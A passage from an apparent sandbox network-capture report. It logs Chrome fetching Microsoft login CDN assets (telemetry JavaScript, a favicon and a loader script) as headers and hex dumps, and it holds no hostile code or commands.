                                                                                                                                          2024-11-18 05:47:47 UTC16383INData Raw: 5d 29 2c 65 2e 65 6d 70 74 79 53 6e 69 70 70 65 74 51 75 65 75 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 29 7b 4f 62 6a 65 63 74 28 53 2e 73 29 28 6e 29 7c 7c 6e 2c 4f 62 6a 65 63 74 28 53 2e 43 29 28 65 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 29 7b 69 66 28 4f 62 6a 65 63 74 28 53 2e 76 29 28 6e 29 26 26 21 4f 62 6a 65 63 74 28 53 2e 70 29 28 72 29 26 26 6e 26 26 22 5f 22 21 3d 3d 6e 5b 30 5d 26 26 2d 31 3d 3d 3d 4f 62 6a 65 63 74 28 53 2e 63 29 28 52 74 2c 6e 29 29 74 72 79 7b 74 5b 6e 5d 3d 72 7d 63 61 74 63 68 28 74 29 7b 4f 62 6a 65 63 74 28 66 2e 64 29 28 65 2e 6c 6f 67 67 65 72 2c 32 2c 35 31 34 2c 22 46 61 69 6c 65 64 20 74 6f 20 73 65 74 20 5b 22 2b 6e 2b 22 5d 20 64 75 72 69 6e
                                                                                                                                          Data Ascii: ]),e.emptySnippetQueue=function(t){try{if(function(){if(t){Object(S.s)(n)||n,Object(S.C)(e,(function(n,r){if(Object(S.v)(n)&&!Object(S.p)(r)&&n&&"_"!==n[0]&&-1===Object(S.c)(Rt,n))try{t[n]=r}catch(t){Object(f.d)(e.logger,2,514,"Failed to set ["+n+"] durin
                                                                                                                                          2024-11-18 05:47:47 UTC16383INData Raw: 69 6e 64 65 78 4f 66 28 74 2c 6e 29 3b 76 61 72 20 72 3d 65 5b 61 2e 78 5d 2c 69 3d 6e 7c 7c 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 6f 3d 4d 61 74 68 2e 6d 61 78 28 69 3e 3d 30 3f 69 3a 72 2d 4d 61 74 68 2e 61 62 73 28 69 29 2c 30 29 3b 6f 3c 72 3b 6f 2b 2b 29 69 66 28 6f 20 69 6e 20 65 26 26 65 5b 6f 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6f 7d 63 61 74 63 68 28 65 29 7b 7d 7d 72 65 74 75 72 6e 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 57 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3b 69 66 28 65 29 7b 69 66 28 65 2e 6d 61 70 29 72 65 74 75 72 6e 20 65 2e 6d 61 70 28 74 2c 6e 29 3b 76 61 72 20 69 3d 65 5b 61 2e 78 5d 2c 6f 3d 6e 7c 7c 65 3b 72 3d 6e 65 77 20 41 72 72 61 79 28 69 29 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 69 3b 63 2b 2b 29 63 20
                                                                                                                                          Data Ascii: indexOf(t,n);var r=e[a.x],i=n||0;try{for(var o=Math.max(i>=0?i:r-Math.abs(i),0);o<r;o++)if(o in e&&e[o]===t)return o}catch(e){}}return-1}function W(e,t,n){var r;if(e){if(e.map)return e.map(t,n);var i=e[a.x],o=n||e;r=new Array(i);try{for(var c=0;c<i;c++)c


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          40192.168.2.1655166152.199.21.1754436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:48 UTC394OUTGET /shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js HTTP/1.1
                                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:48 UTC751INHTTP/1.1 200 OK
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Age: 20649886
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-MD5: wegr9xrdYirQ87+FcvY0/A==
                                                                                                                                          Content-Type: application/x-javascript
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:48 GMT
                                                                                                                                          Etag: 0x8DB5D44A2CEB430
                                                                                                                                          Last-Modified: Thu, 25 May 2023 17:22:37 GMT
                                                                                                                                          Server: ECAcc (lhc/7931)
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Cache: HIT
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-request-id: e556728b-d01e-00f6-6fae-7d057f000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          Content-Length: 190152
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:48 UTC16383INData Raw: 28 77 69 6e 64 6f 77 2e 74 65 6c 65 6d 65 74 72 79 5f 77 65 62 70 61 63 6b 4a 73 6f 6e 70 3d 77 69 6e 64 6f 77 2e 74 65 6c 65 6d 65 74 72 79 5f 77 65 62 70 61 63 6b 4a 73 6f 6e 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 5d 2c 5b 2c 2c 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 22 56 61 6c 75 65 4b 69 6e 64 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 65 7d 29 29 2c 6e 2e 64 28 74 2c 22 45 76 65 6e 74 4c 61 74 65 6e 63 79 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 61 7d 29 29 2c 6e 2e 64 28 74 2c 22 45 76 65 6e 74 50 65 72 73 69 73 74 65 6e 63 65 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 62 7d
                                                                                                                                          Data Ascii: (window.telemetry_webpackJsonp=window.telemetry_webpackJsonp||[]).push([[2],[,,,function(e,t,n){"use strict";n.r(t),n.d(t,"ValueKind",(function(){return r.e})),n.d(t,"EventLatency",(function(){return r.a})),n.d(t,"EventPersistence",(function(){return r.b}
                                                                                                                                          2024-11-18 05:47:48 UTC1INData Raw: 74
                                                                                                                                          Data Ascii: t
                                                                                                                                          2024-11-18 05:47:48 UTC16383INData Raw: 2c 22 50 72 6f 70 65 72 74 69 65 73 50 6c 75 67 69 6e 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 67 2e 61 7d 29 29 2c 6e 2e 64 28 74 2c 22 50 6f 73 74 43 68 61 6e 6e 65 6c 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 2e 61 7d 29 29 2c 6e 2e 64 28 74 2c 22 43 6f 72 65 55 74 69 6c 73 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 2e 61 7d 29 29 2c 6e 2e 64 28 74 2c 22 42 45 5f 50 52 4f 46 49 4c 45 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 2e 61 7d 29 29 2c 6e 2e 64 28 74 2c 22 4e 52 54 5f 50 52 4f 46 49 4c 45 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 2e 62 7d 29 29 2c 6e 2e 64 28 74 2c 22 52 54 5f 50 52 4f 46 49 4c 45 22 2c 28 66 75 6e 63 74 69 6f 6e
                                                                                                                                          Data Ascii: ,"PropertiesPlugin",(function(){return g.a})),n.d(t,"PostChannel",(function(){return v.a})),n.d(t,"CoreUtils",(function(){return c.a})),n.d(t,"BE_PROFILE",(function(){return p.a})),n.d(t,"NRT_PROFILE",(function(){return p.b})),n.d(t,"RT_PROFILE",(function
                                                                                                                                          2024-11-18 05:47:49 UTC16383INData Raw: 69 73 2e 74 79 70 65 4e 61 6d 65 29 29 7c 7c 22 6e 6f 74 5f 73 70 65 63 69 66 69 65 64 22 3b 76 61 72 20 61 3d 74 2e 73 74 61 63 6b 44 65 74 61 69 6c 73 7c 7c 6c 65 28 74 29 3b 74 68 69 73 2e 70 61 72 73 65 64 53 74 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3d 65 2e 6f 62 6a 3b 69 66 28 6e 26 26 6e 2e 6c 65 6e 67 74 68 3e 30 29 7b 74 3d 5b 5d 3b 76 61 72 20 72 3d 30 2c 69 3d 30 3b 4f 62 6a 65 63 74 28 53 2e 62 29 28 6e 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 67 65 2e 72 65 67 65 78 2e 74 65 73 74 28 6e 29 29 7b 76 61 72 20 61 3d 6e 65 77 20 67 65 28 6e 2c 72 2b 2b 29 3b 69 2b 3d 61 2e 73 69 7a 65 49 6e 42 79 74 65 73 2c 74 2e 70 75 73 68 28 61 29 7d 7d 29 29 3b
                                                                                                                                          Data Ascii: is.typeName))||"not_specified";var a=t.stackDetails||le(t);this.parsedStack=function(e){var t,n=e.obj;if(n&&n.length>0){t=[];var r=0,i=0;Object(S.b)(n,(function(e){var n=e.toString();if(ge.regex.test(n)){var a=new ge(n,r++);i+=a.sizeInBytes,t.push(a)}}));
                                                                                                                                          2024-11-18 05:47:49 UTC16383INData Raw: 63 79 20 70 72 65 76 65 6e 74 73 20 75 73 20 66 72 6f 6d 20 67 65 74 74 69 6e 67 20 74 68 65 20 64 65 74 61 69 6c 73 20 6f 66 20 74 68 69 73 20 65 78 63 65 70 74 69 6f 6e 2e 20 43 6f 6e 73 69 64 65 72 20 75 73 69 6e 67 20 74 68 65 20 27 63 72 6f 73 73 6f 72 69 67 69 6e 27 20 61 74 74 72 69 62 75 74 65 2e 22 2c 61 2c 74 2e 6c 69 6e 65 4e 75 6d 62 65 72 7c 7c 30 2c 74 2e 63 6f 6c 75 6d 6e 4e 75 6d 62 65 72 7c 7c 30 2c 6e 2c 72 2c 6e 75 6c 6c 2c 6f 29 2c 63 29 3a 28 74 2e 65 72 72 6f 72 53 72 63 7c 7c 28 74 2e 65 72 72 6f 72 53 72 63 3d 6f 29 2c 65 2e 74 72 61 63 6b 45 78 63 65 70 74 69 6f 6e 28 7b 65 78 63 65 70 74 69 6f 6e 3a 74 2c 73 65 76 65 72 69 74 79 4c 65 76 65 6c 3a 33 7d 2c 63 29 29 7d 63 61 74 63 68 28 65 29 7b 76 61 72 20 75 3d 6e 3f 6e 2e 6e 61
                                                                                                                                          Data Ascii: cy prevents us from getting the details of this exception. Consider using the 'crossorigin' attribute.",a,t.lineNumber||0,t.columnNumber||0,n,r,null,o),c):(t.errorSrc||(t.errorSrc=o),e.trackException({exception:t,severityLevel:3},c))}catch(e){var u=n?n.na
                                                                                                                                          2024-11-18 05:47:49 UTC16383INData Raw: 65 3d 4f 62 6a 65 63 74 28 63 2e 74 29 28 65 29 3f 65 3a 7b 7d 3b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 4f 62 6a 65 63 74 28 63 2e 74 29 28 74 29 3f 74 3a 7b 7d 3b 74 68 69 73 2e 5f 73 65 74 42 61 73 69 63 50 72 6f 70 65 72 74 69 65 73 28 6e 2c 65 29 2c 74 68 69 73 2e 5f 73 65 74 50 61 67 65 54 61 67 73 28 6e 2c 65 29 2c 6e 2e 69 73 4d 61 6e 75 61 6c 3d 21 65 2e 69 73 41 75 74 6f 2c 72 2e 62 65 68 61 76 69 6f 72 3d 74 68 69 73 2e 5f 67 65 74 42 65 68 61 76 69 6f 72 28 65 29 2c 72 2e 76 70 48 65 69 67 68 74 3d 65 2e 76 70 48 65 69 67 68 74 2c 72 2e 76 70 57 69 64 74 68 3d 65 2e 76 70 57 69 64 74 68 2c 72 2e 66 72 61 6d 65 77 6f 72 6b 3d 65 2e 66 72 61 6d 65 77 6f 72 6b 2c 72 2e 73 79 73 74 65 6d 54 69 6d 69 6e 67 3d 65 2e 73 79 73 74 65 6d 54 69 6d 69 6e 67 2c
                                                                                                                                          Data Ascii: e=Object(c.t)(e)?e:{};var n={},r=Object(c.t)(t)?t:{};this._setBasicProperties(n,e),this._setPageTags(n,e),n.isManual=!e.isAuto,r.behavior=this._getBehavior(e),r.vpHeight=e.vpHeight,r.vpWidth=e.vpWidth,r.framework=e.framework,r.systemTiming=e.systemTiming,
                                                                                                                                          2024-11-18 05:47:49 UTC16383INData Raw: 6f 72 22 5d 29 2c 65 2e 65 6d 70 74 79 53 6e 69 70 70 65 74 51 75 65 75 65 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 29 7b 4f 62 6a 65 63 74 28 53 2e 73 29 28 6e 29 7c 7c 6e 2c 4f 62 6a 65 63 74 28 53 2e 43 29 28 65 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 29 7b 69 66 28 4f 62 6a 65 63 74 28 53 2e 76 29 28 6e 29 26 26 21 4f 62 6a 65 63 74 28 53 2e 70 29 28 72 29 26 26 6e 26 26 22 5f 22 21 3d 3d 6e 5b 30 5d 26 26 2d 31 3d 3d 3d 4f 62 6a 65 63 74 28 53 2e 63 29 28 52 74 2c 6e 29 29 74 72 79 7b 74 5b 6e 5d 3d 72 7d 63 61 74 63 68 28 74 29 7b 4f 62 6a 65 63 74 28 66 2e 64 29 28 65 2e 6c 6f 67 67 65 72 2c 32 2c 35 31 34 2c 22 46 61 69 6c 65 64 20 74 6f 20 73 65 74 20 5b 22 2b 6e 2b 22 5d 20 64 75
                                                                                                                                          Data Ascii: or"]),e.emptySnippetQueue=function(t){try{if(function(){if(t){Object(S.s)(n)||n,Object(S.C)(e,(function(n,r){if(Object(S.v)(n)&&!Object(S.p)(r)&&n&&"_"!==n[0]&&-1===Object(S.c)(Rt,n))try{t[n]=r}catch(t){Object(f.d)(e.logger,2,514,"Failed to set ["+n+"] du
                                                                                                                                          2024-11-18 05:47:49 UTC16383INData Raw: 20 65 2e 69 6e 64 65 78 4f 66 28 74 2c 6e 29 3b 76 61 72 20 72 3d 65 5b 61 2e 78 5d 2c 69 3d 6e 7c 7c 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 6f 3d 4d 61 74 68 2e 6d 61 78 28 69 3e 3d 30 3f 69 3a 72 2d 4d 61 74 68 2e 61 62 73 28 69 29 2c 30 29 3b 6f 3c 72 3b 6f 2b 2b 29 69 66 28 6f 20 69 6e 20 65 26 26 65 5b 6f 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6f 7d 63 61 74 63 68 28 65 29 7b 7d 7d 72 65 74 75 72 6e 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 57 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3b 69 66 28 65 29 7b 69 66 28 65 2e 6d 61 70 29 72 65 74 75 72 6e 20 65 2e 6d 61 70 28 74 2c 6e 29 3b 76 61 72 20 69 3d 65 5b 61 2e 78 5d 2c 6f 3d 6e 7c 7c 65 3b 72 3d 6e 65 77 20 41 72 72 61 79 28 69 29 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 63 3d 30 3b 63 3c 69 3b 63 2b 2b
                                                                                                                                          Data Ascii: e.indexOf(t,n);var r=e[a.x],i=n||0;try{for(var o=Math.max(i>=0?i:r-Math.abs(i),0);o<r;o++)if(o in e&&e[o]===t)return o}catch(e){}}return-1}function W(e,t,n){var r;if(e){if(e.map)return e.map(t,n);var i=e[a.x],o=n||e;r=new Array(i);try{for(var c=0;c<i;c++
                                                                                                                                          2024-11-18 05:47:49 UTC16383INData Raw: 69 2e 45 5d 7c 7c 39 3d 3d 3d 65 5b 69 2e 45 5d 7c 7c 21 2b 65 5b 69 2e 45 5d 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 5b 65 2e 69 64 5d 3b 69 66 28 21 6e 29 7b 6e 3d 7b 7d 3b 74 72 79 7b 6c 28 74 29 26 26 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 69 66 28 75 29 74 72 79 7b 72 65 74 75 72 6e 20 75 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6e 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 7d 72 65 74 75 72 6e 21 31 7d 28 74 2c 65 2e 69 64 2c 6e 29 7c 7c 28 74 5b 65 2e 69 64 5d 3d 6e 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30
                                                                                                                                          Data Ascii: i.E]||9===e[i.E]||!+e[i.E]}function d(e,t){var n=t[e.id];if(!n){n={};try{l(t)&&(function(e,t,n){if(u)try{return u(e,t,{value:n,enumerable:!1,configurable:!0}),!0}catch(e){}return!1}(t,e.id,n)||(t[e.id]=n))}catch(e){}}return n}function b(e,t){return void 0
                                                                                                                                          2024-11-18 05:47:49 UTC16383INData Raw: 2c 73 65 74 4e 61 6d 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 64 26 26 64 2e 73 65 74 4e 61 6d 65 28 65 29 2c 62 2e 6e 61 6d 65 3d 65 7d 2c 67 65 74 54 72 61 63 65 49 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 2e 74 72 61 63 65 49 64 7d 2c 73 65 74 54 72 61 63 65 49 64 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 64 26 26 64 2e 73 65 74 54 72 61 63 65 49 64 28 65 29 2c 4f 62 6a 65 63 74 28 6f 2e 66 29 28 65 29 26 26 28 62 2e 74 72 61 63 65 49 64 3d 65 29 7d 2c 67 65 74 53 70 61 6e 49 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 2e 70 61 72 65 6e 74 49 64 7d 2c 73 65 74 53 70 61 6e 49 64 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 64 26 26 64 2e 73 65 74 53 70 61 6e 49 64 28 65 29 2c 4f 62 6a 65 63 74 28 6f 2e 65 29 28 65 29 26
                                                                                                                                          Data Ascii: ,setName:function(e){d&&d.setName(e),b.name=e},getTraceId:function(){return b.traceId},setTraceId:function(e){d&&d.setTraceId(e),Object(o.f)(e)&&(b.traceId=e)},getSpanId:function(){return b.parentId},setSpanId:function(e){d&&d.setSpanId(e),Object(o.e)(e)&


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          41192.168.2.1655167152.199.21.1754436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:48 UTC651OUTGET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1
                                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                          Referer: https://login.microsoftonline.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:48 UTC720INHTTP/1.1 200 OK
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Age: 20650146
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-MD5: EuPayFgGHQiAI7K9SOL6lg==
                                                                                                                                          Content-Type: image/x-icon
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:48 GMT
                                                                                                                                          Etag: 0x8D8731240E548EB
                                                                                                                                          Last-Modified: Sun, 18 Oct 2020 03:02:30 GMT
                                                                                                                                          Server: ECAcc (lhc/7944)
                                                                                                                                          X-Cache: HIT
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-request-id: 1c016ee5-901e-008a-08ad-7d0366000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          Content-Length: 17174
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:48 UTC16383INData Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
                                                                                                                                          Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
                                                                                                                                          2024-11-18 05:47:48 UTC791INData Raw: 01 80 00 00 01 80 00 28 00 00 00 18 00 00 00 30 00 00 00 01 00 04 00 00 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30 22 22 22 22 22 20 33 33 33 33 33 30
                                                                                                                                          Data Ascii: (0"P""""" 333330""""" 333330""""" 333330""""" 333330""""" 333330""""" 333330""""" 333330""""" 333330""""" 333330""""" 333330""""" 333330


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          42192.168.2.1655168152.199.21.1754436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:48 UTC620OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_117b650bccea354984d8.js HTTP/1.1
                                                                                                                                          Host: aadcdn.msftauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://login.microsoftonline.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:48 UTC750INHTTP/1.1 200 OK
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                          Age: 8100966
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-MD5: LT++1t3XGfzBv7UAthL87A==
                                                                                                                                          Content-Type: application/x-javascript
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:48 GMT
                                                                                                                                          Etag: 0x8DCBD52F37806EC
                                                                                                                                          Last-Modified: Thu, 15 Aug 2024 17:51:54 GMT
                                                                                                                                          Server: ECAcc (lhc/7888)
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Cache: HIT
                                                                                                                                          x-ms-blob-type: BlockBlob
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-request-id: 10a7d1b4-001e-005d-7bcf-ef5e4a000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          Content-Length: 406986
                                                                                                                                          Connection: close
                                                                                                                                          2024-11-18 05:47:49 UTC16383INData Raw: 2f 2a 21 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 2a 20 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20 62 65 6c 6f 77 20 28 54 68 69 72 64 20 50 61 72 74 79 20 49 50 29 2e 20 54 68 65 20 6f 72 69 67 69 6e 61 6c 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61
                                                                                                                                          Data Ascii: /*! * ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice a
                                                                                                                                          2024-11-18 05:47:49 UTC16383INData Raw: 69 3d 4d 61 74 68 2e 6d 69 6e 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 3d 6e 28 74 29 3b 72 65 74 75 72 6e 20 72 3c 30 3f 6f 28 72 2b 65 2c 30 29 3a 69 28 72 2c 65 29 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 72 28 35 33 37 29 3b 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 72 3d 5b 5d 5b 74 5d 3b 72 65 74 75 72 6e 21 21 72 26 26 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 2e 63 61 6c 6c 28 6e 75 6c 6c 2c 65 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 31 7d 2c 31 29 7d 29 29 7d 7d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20
